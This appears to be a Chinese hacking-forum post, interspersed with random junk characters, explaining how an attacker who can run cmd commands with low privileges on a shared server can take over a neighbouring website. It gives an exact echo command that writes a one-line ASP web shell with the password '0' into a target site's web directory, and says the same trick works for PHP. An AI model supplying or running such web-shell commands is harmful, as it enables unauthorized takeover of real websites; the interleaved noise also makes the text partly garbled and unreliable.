在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。7 Z% l% h+ Z! M
1 G ~0 _5 z: @
命令格式
* }7 k. S: n4 P& b
9 ]. \. l& j- j3 K3 \Echo 语句 >目标站绝对目录3 E) I1 z9 H1 `1 m1 r0 S( R
) o N3 ^; v2 ? M
例如: ( s7 h+ o5 k2 F
8 @1 _* D8 D" K3 ?+ Z1 uecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp* f3 w1 r% A9 d- A f+ O! ^+ G
" z0 g8 A) Q: q这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。* q3 ?3 y* I3 P I1 ]
|